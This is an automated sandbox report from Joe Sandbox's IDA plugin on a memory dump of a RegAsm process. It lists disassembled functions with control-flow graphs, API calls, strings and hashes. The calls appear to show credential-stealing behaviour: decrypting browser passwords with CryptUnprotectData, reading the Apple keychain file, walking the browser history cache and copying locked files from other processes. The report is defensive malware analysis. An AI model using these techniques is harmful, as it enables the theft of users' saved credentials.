                                                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                • API String ID: 2334598624-3798722523
                                                                                                                                                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                • API String ID: 1442760552-28296030
                                                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                • String ID: chp$v10
                                                                                                                                                                                • API String ID: 229402216-2783969131
                                                                                                                                                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                • String ID: bhv
                                                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                • exit.MSVCRT ref: 00446897
                                                                                                                                                                                • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2791496988-0
                                                                                                                                                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                • String ID: visited:
                                                                                                                                                                                • API String ID: 2470578098-1702587658
                                                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 646 40e283-40e286 640->646 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 646->648 649 40e288-40e290 free 646->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
